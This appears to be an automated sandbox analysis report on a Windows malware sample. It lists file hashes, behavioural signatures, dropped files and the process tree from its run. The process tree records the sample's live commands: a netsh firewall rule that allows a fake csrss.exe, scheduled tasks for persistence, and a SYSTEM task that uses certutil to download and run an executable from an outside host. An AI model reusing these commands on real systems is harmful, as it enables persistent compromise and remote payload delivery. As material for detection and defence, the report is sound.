Analysis
-
max time kernel
27s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 02:52
Static task
static1
Behavioral task
behavioral1
Sample
f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
Resource
win7-20220414-en
General
-
Target
f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
-
Size
3.8MB
-
MD5
e424b0225f4a52439d751fde2bafde40
-
SHA1
7199d44b399f1de33be40a5f5ad615816c9c0846
-
SHA256
f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e
-
SHA512
0a4ab1f81f10eb7629e43097cb19f4b9a8ef00a452d4edd77cfd2bbb0d0c9581401d88432cf48494aeb35f8795df2034a56e59e1b9ae6dd889894a3e5eb49a2f
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1140 bcdedit.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 17 IoCs
Processes:
netsh.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exef9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exepid process 1720 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe 428 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exedescription pid process Token: SeDebugPrivilege 1720 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe Token: SeImpersonatePrivilege 1720 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.execmd.exedescription pid process target process PID 428 wrote to memory of 1612 428 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe cmd.exe PID 428 wrote to memory of 1612 428 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe cmd.exe PID 428 wrote to memory of 1612 428 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe cmd.exe PID 428 wrote to memory of 1612 428 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe cmd.exe PID 1612 wrote to memory of 776 1612 cmd.exe netsh.exe PID 1612 wrote to memory of 776 1612 cmd.exe netsh.exe PID 1612 wrote to memory of 776 1612 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524045322.log C:\Windows\Logs\CBS\CbsPersist_20220524045322.cab1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1021KB
MD5276cdc77b76cc54dabe28221371059e8
SHA160ef7c80af61f364d20093460e4498074d2b8206
SHA25667543e6156207a069d088c593522dcb8e57ccf5f823052c524ba97aa2f0a98ee
SHA5128d3a2f76358b227958f00b4c2de45235dc17e534badf63513bec5f145c45201c73ce59936ae19498266ce0eb72e521b5f1927d7de01b9e0f11a401b17a88bf89
-
C:\Windows\rss\csrss.exeFilesize
1.1MB
MD5fdf58d032fef463c7354046ccb60d2c5
SHA13205f5b482590fe94f6f8e71fb5337f865f7a5f1
SHA2566dac944f7a58fc23568528a66a8ef70fe90ddeb5e117b8f8ccaad87ae7b8e3f2
SHA512d097dcda7134511bf962ee274cdc0ebcc1f1431dd4d1ed032e879f7094b10f07c1b1393c7cd4d194cded5ef1d0a31be570e029ecf300a24939b88110e598eaf2
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.0MB
MD5dc18c26e31bcd1e198896d6adcb911e1
SHA1cbc59029137fbd1bbd7dc09277d6fa8aaf22febc
SHA2565e687f9d93f20a7a47938f7ab08d1427f47c412fdc65bfeac3b1458962c98bf9
SHA512572035bec6488c9231cf18664a8db3546b2a666d492232398c2b31e4a49bdd9dc6f0d188734357bc218d355691fd55925599825a467c27c55c431349f70f25cf
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
648KB
MD5f9be669affcaa92e22c9a0c561cf801a
SHA1d2f9833017e91843253ecd37b7a45ce88cee8795
SHA25621d1efd786411d18826e8d5246e72444b6ba9dcf04459c4a45591f1856ba3a7e
SHA5127ffb2482538aa6d9d4c0ff50ca490c202166602ab0c31d8e6953bba573f029e7c73140fce2f83e65b0be798a481fc1fa9238609ce6a9fbd0688dc167bc8b6142
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
733KB
MD52fbf020fbc32ce3cd93f6d7bdcb5a29f
SHA1229486255a583406b5ae1691fa5e833dde45d00a
SHA25648354876312c30e393a8867803fc44ac1b41519655211fe4ca02dcf7fb8f615e
SHA512a67e63ae2bfcffbb6e1b087936420a8b8e44c5cf3bd3a94c7f61ce0dc7dcb0b7302cad081131ff07f37b5a097bac1e8b75f14655a94748c7b9248de97db41ea7
-
\Users\Admin\AppData\Local\Temp\dbghelp.dllFilesize
1018KB
MD56109aa601a138c0c9c4b95cba368a39b
SHA10790daaa1e6f64821990904700d5e44ccfe404d2
SHA256e9e37d233e74840beff30a6210980349bfcc6ad664aa30d3e2fd45d664c63d9b
SHA5123969fcdb0942fa21d9c35a2a3d3d32cb5b38563677ebefdf64522c8a1f6410b13eb70139c1a0fd2fdb77ec3c11f979dd23fc129d309364e3b16ee24ab6c11e2d
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.1MB
MD5bae0ea83c6fdaa4eb7040c5432947cc8
SHA1b4dd209750374e0ca1f242dd15feef600ad16de0
SHA25619921bba5e87d6242a684af81e8d711af2e91a52c759f6c6900742fa6c970319
SHA512cd408293fd53c2ae01a25047e57e673ded53329e92e4a7f9fd94c137d00b68f08e78be3c0c2776c6be46bb7a00c2dbb7f3b86085a23ca314fe87cdb0b1b1b1b3
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.0MB
MD51436b03d344a5c4a7b92970aeb4fa684
SHA1c0309499ca487900bd6fb58762438c76fd0ff423
SHA256d407a47a117a77026638a5970fda440ca25906727d1d7ad97c35fcac508ef7c5
SHA5127082a267ed04ee1d05ec4f8cda501785549e5986c258627fc0d9494ef64bb3b0e06e19efa552945b1285cfef1e1774fae40ef5d52c514519308a658b19a78eb4
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.0MB
MD5a2627e145b0e8c09ce9dcf28b98fdae8
SHA1147e75d5e1e31844ef04072ebdc3ef6911bf3fe2
SHA256c34d2e99d76b6722ef8058238b3cb59307e5ba989fb81078cb6f59568a420528
SHA51284d265b30bb3b4797b8fa087afcb3d581083e510b07ac2729075a4f90a434ac589ae9fef6108758b4acff54ab6d19699b38a776ba0008231b5fe0c087212b735
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
528KB
MD52ee1fc6fe22665bda8472c00919d7d5b
SHA1bf04753227da94d8e17e65ef2aa43f49ef33ce49
SHA256de7acac110ccda6fb63480c11c53ced38ff04dc0ddb99eb11bec41ef992ac9e6
SHA512a8b686cce66ef915a5c2130003a16f73f5e07d7971d612974fa29bf0cc61a8b2c6054cfe34fba186f1b7b7150bac4388b388322ba9f401c5e78e52608ea77bf5
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
508KB
MD5c28538794f51c845ab46e1cd7c3440e9
SHA193b0b555ba4c601c842759d9fb2c554aa60d967b
SHA2563a429c75b58d5c28312d1a8a5bc7d3cee289fc48eb7c212a68f17750aaf5d184
SHA512f153a13854e55d5ef81b876c6755dc1c0ef2a03de6ce6ec2ab4eb236bf963f960b33a3993b3f27d8b64192f0924e18f18c201f97b1a2272b3744f0edabc6951c
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
454KB
MD5616a78ad95bc201d7f631561882de1fb
SHA1e5eb1134a56aa8eb67b1972e0285199548f8d93f
SHA2560530b4398c89bc98480103b72f0a398724ee1b3b014bfdad836990edafddb6ed
SHA5125bacac46ab41bdcade7ee2d07e827604bf53b083773df2b1c66e9bf478a96ad2f5b28e1a51c843ff145b9e59dcfffc29adb41660a1a5394f31f273d3d72278a8
-
\Users\Admin\AppData\Local\Temp\symsrv.dllFilesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
\Windows\rss\csrss.exeFilesize
987KB
MD5fabcf4212b5323003245df6249164d7d
SHA1c6fa7ecae15fcc473b80592e1d3e81d43701a8db
SHA256da34626e17fa8eb50b9da678b4e43cc491638c5348890c96020f8971822f96e2
SHA5121ce7f5697ab2224252af77e3d01a971b17b14b231d862128fa5fd3df51ad02c31439bbe32b279755f99761fd91f4215960fda0c381380ac58058437f6138f08d
-
\Windows\rss\csrss.exeFilesize
1000KB
MD502c2b8493a35a8541cb49944e99262e8
SHA15a381437c6c213c8ad8585977a31cede12cefec0
SHA2566619bef07e940ab2c8e903e6cf004df72a6a5405dff9886c545268705795aaf0
SHA51200e84f385f8eab65c13249700b7b8f015dd44c7f849a6f1008fb803655554445f0ec17cd9c62a01d6bd7ca9921ce6f045d03aad77ac57ffbccef75700cae3c71
-
memory/428-67-0x0000000000400000-0x000000000313D000-memory.dmpFilesize
45.2MB
-
memory/428-66-0x00000000033C0000-0x0000000003766000-memory.dmpFilesize
3.6MB
-
memory/428-58-0x00000000033C0000-0x0000000003766000-memory.dmpFilesize
3.6MB
-
memory/776-61-0x000007FEFC041000-0x000007FEFC043000-memory.dmpFilesize
8KB
-
memory/776-60-0x0000000000000000-mapping.dmp
-
memory/1140-84-0x0000000000000000-mapping.dmp
-
memory/1612-59-0x0000000000000000-mapping.dmp
-
memory/1720-54-0x00000000033D0000-0x0000000003776000-memory.dmpFilesize
3.6MB
-
memory/1720-57-0x0000000000400000-0x000000000313D000-memory.dmpFilesize
45.2MB
-
memory/1720-56-0x0000000003780000-0x0000000003E75000-memory.dmpFilesize
7.0MB
-
memory/1720-55-0x00000000033D0000-0x0000000003776000-memory.dmpFilesize
3.6MB
-
memory/1940-70-0x0000000000400000-0x000000000313D000-memory.dmpFilesize
45.2MB
-
memory/1940-69-0x0000000003140000-0x00000000034E6000-memory.dmpFilesize
3.6MB
-
memory/1940-68-0x0000000003140000-0x00000000034E6000-memory.dmpFilesize
3.6MB
-
memory/1940-64-0x0000000000000000-mapping.dmp